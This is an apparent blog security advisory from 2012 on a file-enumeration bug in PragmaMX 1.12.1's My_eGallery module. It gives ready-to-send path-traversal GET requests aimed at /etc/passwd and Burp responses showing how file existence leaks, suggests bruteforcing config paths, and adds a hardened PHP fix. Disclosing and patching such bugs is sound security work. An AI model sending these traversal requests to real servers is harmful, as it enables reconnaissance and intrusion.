Sunday 18 March 2012

[EN] PragmaMX 1.12.1 - remote file enumeration


# TITLE ....... # PragmaMx 1.12.1 remote file enumeration ......................................... #
# DATE ........ # 15.03.2012 ...................................................................... #
# AUTHOR ...... # http://hauntit.blogspot.com ..................................................... #
# SOFT LINK ... # http://pragmamx.org ............................................................. #
# VERSION ..... # 1.12.1 .......................................................................... #
# TESTED ON ... # LAMP ............................................................................ #
# ................................................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#..........................................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)

#..........................................................#
# 2. What is the type of vulnerability?

This is a "remote file enumeration" bug.
After some fuzzing tests I found some nice behavior in the new PragmaMX.

The "correct functionality" is that the z-parameter handles an image filename.
I did something else: I pointed the 'filename' at 'another file in the file system',
for example /etc/passwd.


#..........................................................#
# 3. Where is bug :)

The vulnerable parameter is "z".
If we send a GET like this:

http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&width=295&height=420

the response should look like:
...cut.from.Burp...
(...)
 <head>
    <title>/etc/passwd</title>
  </head>
  <body style="margin: 0; padding: 0;">
    <img src="../../../../../../../../../../../../etc/passwd" width="295" height="420" alt="/etc/passwd" />  </body>
</html>
...cut.from.Burp...

This will be the answer "if the remote file is there". By "there" I mean the location of the file you point at.

If the file you chose does not exist, the answer will be something like:
(GET:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdlalala.txt&width=295&height=420
)

...cut.from.Burp...
 <head>
    <title></title>
  </head>
  <body style="margin: 0; padding: 0;">
    <img src="../../../../../../../../../../../../etc/passwdlalala.txt" width="295" height="420" alt="" />  </body>
</html>
...cut.from.Burp...

So the difference is in the "alt" attribute (and the <title>) of the answer.
If on the remote server we can 'find a file x', then this name 'x' will be presented in the HTTP response.
If at the remote location we cannot find the file (x), then the output (alt attribute) will be blank.

This vulnerability can be used to:
a) check for other LFI/RFI-based attacks
b) write a bruteforcer to determine the OS/PHP version, get paths of configs, etc.


And here is where it comes from:
./modules/My_eGallery/image.php:19:$img = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';
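The line above accepts any string for `z`, and the two responses shown earlier demonstrate that whether the resolved path exists leaks back through the `alt` attribute and `<title>`. As an added example (this is not PragmaMx's own code; `$galleryRoot`, the helper name `resolve_gallery_image` and the `images/` directory are assumptions), here is that line beside a hardened form that confines `z` to a single filename inside the gallery directory, checks the resolved path stays under that directory, and escapes the name on output. Any request naming a path outside the gallery is rejected before the filesystem is consulted, so the response no longer depends on whether such a file exists:

```php
<?php
// Original (vulnerable) form from modules/My_eGallery/image.php, line 19:
//   $img = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';
// Any string, including ../../etc/passwd, reaches the <img>/<title>/alt output.

// Hardened form (added example; $galleryRoot is an assumed location).
// Returns the validated filename, or null when the request must be refused.
function resolve_gallery_image(string $galleryRoot, string $z): ?string
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($z === '' || strpos($z, "\0") !== false) {
        return null;
    }
    // A bare filename only: anything with a directory component
    // (including "../" traversal) is refused without a disk lookup,
    // so existence of files outside the gallery is never revealed.
    if (basename($z) !== $z) {
        return null;
    }
    // Allow only a conservative image-filename pattern.
    if (!preg_match('/\A[A-Za-z0-9_.-]+\.(?:jpe?g|png|gif)\z/i', $z)) {
        return null;
    }
    $root = realpath($galleryRoot);
    $full = realpath($galleryRoot . DIRECTORY_SEPARATOR . $z);
    if ($root === false || $full === false) {
        return null;               // gallery missing, or image not present
    }
    // Defence in depth: the canonical path must sit under the gallery root.
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $z;
}

$z   = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';
$img = resolve_gallery_image(__DIR__ . '/images', $z);   // assumed gallery dir
if ($img === null) {
    http_response_code(404);     // same answer for every refused request
    exit;
}
// Escape on output so the filename is always an inert attribute value.
$safe = htmlspecialchars($img, ENT_QUOTES, 'UTF-8');
echo '<title>' . $safe . '</title>';
echo '<img src="images/' . $safe . '" alt="' . $safe . '" />';
```

The important ordering is that the `basename` and pattern checks run before `realpath`: once a path with traversal components reaches a filesystem call, a different response for "exists" versus "does not exist" recreates the oracle this advisory describes, even if the file contents are never returned.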


#..........................................................#
# 4. More...

- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net

#..........................................................#
# 5. Mail me, I'm still looking for new projects... ;)

#............................................#
# Best regards
#
